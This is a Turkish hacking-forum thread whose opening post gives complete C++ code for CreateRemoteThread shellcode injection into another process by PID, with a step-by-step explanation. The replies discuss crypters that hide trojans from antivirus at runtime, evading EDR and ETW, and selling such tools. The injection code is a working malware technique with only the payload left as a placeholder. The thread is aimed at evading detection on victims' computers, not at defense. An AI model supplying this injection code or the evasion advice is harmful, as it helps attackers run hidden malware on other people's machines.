C++ dilinde Shellcode Injection

slowbaskan123 · 4 Ocak 2025

Selamlar bugün C++ dilinde Shellcode Injection tekniğini anlatacağım.
Konuya geçelim.
Öncelikle kodun tamamını;

C++:

#include "stdafx.h"
#include "Windows.h"

int main(int argc, char *argv[])
{
    unsigned char shellcode[] =
        "Shell Code";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    printf("Injecting to PID: %i", atoi(argv[1]));
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof shellcode, NULL);
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(processHandle);

    return 0;
}

Kodun Mantığı;

Hedef süreç açılır (OpenProcess)
Shellcode için hedef sürecin belleğinde alan ayrılır (VirtualAllocEx)
Shellcode hedef belleğe yazılır (WriteProcessMemory)
Hedef süreçte shellcode çalıştırılır (CreateRemoteThread)

Kodun ana mantığı aslında bu şekilde Shellcode hedef sürece yazıyoruz ve örn. PID değeri olarak notepad aldık örn. değer; 7733 değeri.
Shell Kodu "printf("Injecting to PID: %i", atoi(argv[1]));" bölümünde PID değerini aldığımız notepad uygulamasına veya başka bir uygulamaya "WriteProcessMemory" ile yazıyoruz.

Kodun ana mantığı bu şekildeydi daha detaylı incelemek isterseniz kaynakları aşağı bırakıyorum;

CreateRemoteThread Shellcode Injection | Red Team Notes

Injecting shellcode into a local process.

www.ired.team

Eksik veya hatalı gördüğünüz yerleri yazabilirsiniz iyi forumlar.

Senic · 4 Ocak 2025

Hocam crypter ile ilgili paylaşımlar yapmayı bırakmışsınız bence devam etmelisiniz forum crypter konusunda eksik bence crypter ile ilgili paylaşımlar yapmanız ilgi çekecektir

BlackDynamite · 4 Ocak 2025

Senic' Alıntı:
Hocam crypter ile ilgili paylaşımlar yapmayı bırakmışsınız bence devam etmelisiniz forum crypter konusunda eksik bence crypter ile ilgili paylaşımlar yapmanız ilgi çekecektir

bıraktı ilgi olmadı zaten yapcak bise yok ilgi olursa belki atar oda

slowbaskan123 · 4 Ocak 2025

Senic' Alıntı:
Hocam crypter ile ilgili paylaşımlar yapmayı bırakmışsınız bence devam etmelisiniz forum crypter konusunda eksik bence crypter ile ilgili paylaşımlar yapmanız ilgi çekecektir

İlgi yok kardeşim artık farklı projelere yöneleceğim.

1P3RL · 4 Ocak 2025

Emeğine sağlık dostum teşekkür ederim diğer forum arkadaşları adına da iyi çalışmalar dilerim iyi forumlar.

Maveraün Nehr · 4 Ocak 2025

Bu crypter konusu ilgiden dolayı ama ne tür ilgi yani beklenti... Eski bundan 10-11 yıl önce olsaydı çok tutardı çünkü uygulama kullanmasını bilen kendini hek işleri müdürü sanıyordu ince ayrıntılarına hakim değillerdi günümüze baktığımızdaysa size göre ilgisizlik bana göre ise insanların beklentisinin karşılanmaması durumu... Şimdi neden diyeceksiniz hek alemi artık kurumsallaşma yolunda yani çoğu şey belirli bir başlık altında toplanmaya başladı bu yüzden insanlar senden Tarama zamanı(scantime) crypter değil Türkçe tabiri koşu diğer adıyla çalışma zamanı yani runtime crypter istiyorlar. Yakın zamanda açmış olduğun konu görüldüğü kadarıyla online sistemde herhangi bir virüsü full temiz gösteriyor tamam iyi hoş ama kullanıcılar senin kodlamış olduğun crypter ile bir trojan virüsünü gizlemek isteseler hedefin bilgisayarına indirdikleri veya yükledikleri zaman antivirüs virüs uyarısı verir. Siz de birbirinize bakarsınız Allah Allah bu sitede taratınca temiz gösteriyordu şimdi noldu da antivirüs uyarı verdi yoksa patladı mı gibi sorularla konu başka yerlere kayardı... O yüzden scantime ile runtime arasında ki ince detaylara dikkat edelim. Hayırlı geceler

slowbaskan123 · 4 Ocak 2025

Maveraün Nehr' Alıntı:
Bu crypter konusu ilgiden dolayı ama ne tür ilgi yani beklenti... Eski bundan 10-11 yıl önce olsaydı çok tutardı çünkü uygulama kullanmasını bilen kendini hek işleri müdürü sanıyordu ince ayrıntılarına hakim değillerdi günümüze baktığımızdaysa size göre ilgisizlik bana göre ise insanların beklentisinin karşılanmaması durumu... Şimdi neden diyeceksiniz hek alemi artık kurumsallaşma yolunda yani çoğu şey belirli bir başlık altında toplanmaya başladı bu yüzden insanlar senden Tarama zamanı(scantime) crypter değil Türkçe tabiri koşu diğer adıyla çalışma zamanı yani runtime crypter istiyorlar. Yakın zamanda açmış olduğun konu görüldüğü kadarıyla online sistemde herhangi bir virüsü full temiz gösteriyor tamam iyi hoş ama kullanıcılar senin kodlamış olduğun crypter ile bir trojan virüsünü gizlemek isteseler hedefin bilgisayarına indirdikleri veya yükledikleri zaman antivirüs virüs uyarısı verir. Siz de birbirinize bakarsınız Allah Allah bu sitede taratınca temiz gösteriyordu şimdi noldu da antivirüs uyarı verdi yoksa patladı mı gibi sorularla konu başka yerlere kayardı... O yüzden scantime ile runtime arasında ki ince detaylara dikkat edelim. Hayırlı geceler

Hocam burada çok fazla VT atan olduğu için Runtime Crypter paylaşma gibi bir düşüncem yok maalesef aslında biraz araştırma ile yeni Runtime tekniklerini vs. kişi kendisi deneyerek veya kendi yöntemlerini bularak devam edebilir hem daha sağlıklı olur.

kurononyanko · 4 Ocak 2025

bunun vb6 ile mümkünatı nedir?

slowbaskan123 · 5 Ocak 2025

kurononyanko' Alıntı:
bunun vb6 ile mümkünatı nedir?

VB6 ile hiç denemedim genelde bu tarz işlemleri C veya C++ gibi dillerle yazılıyor.

BlackPion · 5 Ocak 2025

slowbaskan123' Alıntı:
Hocam burada çok fazla VT atan olduğu için Runtime Crypter paylaşma gibi bir düşüncem yok maalesef aslında biraz araştırma ile yeni Runtime tekniklerini vs. kişi kendisi deneyerek veya kendi yöntemlerini bularak devam edebilir hem daha sağlıklı olur.

Senin yerinde olsam yaptığım crypterları satarım, sadece parama bakarım VT rapor yollamış x kişisi VT taraması yapmış umrum olmazdı.

BlackDynamite · 5 Ocak 2025

BlackPion' Alıntı:
Senin yerinde olsam yaptığım crypterları satarım, sadece parama bakarım VT rapor yollamış x kişisi VT taraması yapmış umrum olmazdı.

sorun para değil bu devirde scammer crypter yapımcıları var ve bunlar yüzünden kisiler güvenemiyor artık o yüzden samimi ve güven verceksin karsıdakine yoksa almaz satmasıda zor kolay değil bir yazılımı pazarlamak

BlackPion · 5 Ocak 2025

BlackDynamite' Alıntı:
sorun para değil bu devirde scammer crypter yapımcıları var ve bunlar yüzünden kisiler güvenemiyor artık o yüzden samimi ve güven verceksin karsıdakine yoksa almaz satmasıda zor kolay değil bir yazılımı pazarlamak

Tabii bir yazılımın marketingini iyi yapman gerek. Yoksa basit bir UI tasarımını bile satarsın. İyi de bu döngüye girmez mi? Yap piyasaya sür x kişisi taratsın patlasın. Koskoca internette illa ki birileri taratır illa ki patlar. Çok çok uzun süreler ayakta kalacağını sanmıyorum.

BlackDynamite · 5 Ocak 2025

BlackPion' Alıntı:
Tabii bir yazılımın marketingini iyi yapman gerek. Yoksa basit bir UI tasarımını bile satarsın. İyi de bu döngüye girmez mi? Yap piyasaya sür x kişisi taratsın patlasın. Koskoca internette illa ki birileri taratır illa ki patlar. Çok çok uzun süreler ayakta kalacağını sanmıyorum.

yok kalıcı yapmak için OBF Sağlam olcak sifreleme sağlam olcak edr etw hips bunlar olcak ve bunlar olursa 1 ay dayanıyor öyle diyim ama ui güzel yaptın tamam ama müsteri güven istiyor hah samimilik istiyor sen biriyle iliskiye gircen diyelim direkmi giriyorsun yoksa 2 gün bir bakıp tanısıyormusun yani bu kisi kız görünümlü erkekte çıkabilir öyle düsün müsteride diyorki sahte üründe olabilir

C++ dilinde Shellcode Injection

slowbaskan123

Kıdemli Üye

CreateRemoteThread Shellcode Injection | Red Team Notes

Senic

Yeni üye

BlackDynamite

Kıdemli Üye

slowbaskan123

Kıdemli Üye

1P3RL

Katılımcı Üye

Maveraün Nehr

Anka Team

slowbaskan123

Kıdemli Üye

kurononyanko

Katılımcı Üye

slowbaskan123

Kıdemli Üye

BlackPion

Kıdemli Üye

BlackDynamite

Kıdemli Üye

BlackPion

Kıdemli Üye

BlackDynamite

Kıdemli Üye

Sosyal medya sayfalarımız